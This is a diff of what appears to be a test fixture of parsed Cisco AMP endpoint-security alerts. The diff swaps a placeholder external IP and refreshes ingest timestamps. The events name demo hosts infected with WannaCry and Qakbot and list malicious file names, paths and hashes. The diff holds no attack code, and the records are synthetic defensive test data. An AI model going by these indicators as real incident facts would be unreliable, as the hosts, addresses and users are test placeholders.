"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1862,7 +1862,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1903,7 +1903,7 @@
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1913,8 +1913,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798705016Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010757600Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1934,7 +1934,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -1979,7 +1979,7 @@
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1989,8 +1989,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798707293Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010762700Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -2010,7 +2010,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2055,7 +2055,7 @@
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2065,8 +2065,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798709557Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010767300Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "2164260893",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -2086,7 +2086,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2133,7 +2133,7 @@
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2147,8 +2147,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798711839Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010771200Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -2170,7 +2170,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2213,7 +2213,7 @@
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2227,8 +2227,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798714088Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010775500Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -2250,7 +2250,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2297,7 +2297,7 @@
 "f5a171c879b90e77861daf19741b373646d791ff"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2311,8 +2311,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798716338Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010780800Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -2334,7 +2334,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2381,7 +2381,7 @@
 "92673dd0e5f4a094fa6cd57bb301f884f2289f6c"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2395,8 +2395,8 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-30T00:15:10.798718576Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
+ "ingested": "2021-12-09T13:35:47.010785200Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
 "code": "553648147",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -2418,7 +2418,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
@@ -2451,7 +2451,7 @@
 "Demo_BP_WMIPRVSE"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -2470,8 +2470,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798720929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell 